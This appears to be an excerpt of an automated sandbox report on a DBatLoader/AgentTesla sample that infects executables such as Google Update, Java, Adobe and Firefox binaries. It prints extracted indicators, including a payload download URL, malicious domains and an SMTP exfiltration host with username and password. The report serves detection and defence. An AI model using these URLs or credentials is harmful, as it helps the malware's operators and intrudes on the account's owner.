                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Found malware configuration
                    Source: C6dAUcOA6M.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
                    Source: Native_neworigin.exe.7892.40.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
                    Multi AV Scanner detection for domain / URL
                    Source: deoci.bizVirustotal: Detection: 14%Perma Link
                    Source: nqwjmb.bizVirustotal: Detection: 13%Perma Link
                    Source: wllvnzb.bizVirustotal: Detection: 13%Perma Link
                    Source: dwrqljrr.bizVirustotal: Detection: 15%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: C6dAUcOA6M.exeReversingLabs: Detection: 63%
                    Source: C6dAUcOA6M.exeVirustotal: Detection: 62%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: C6dAUcOA6M.exeJoe Sandbox ML: detected
                    Source: C6dAUcOA6M.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
                    Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                    Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
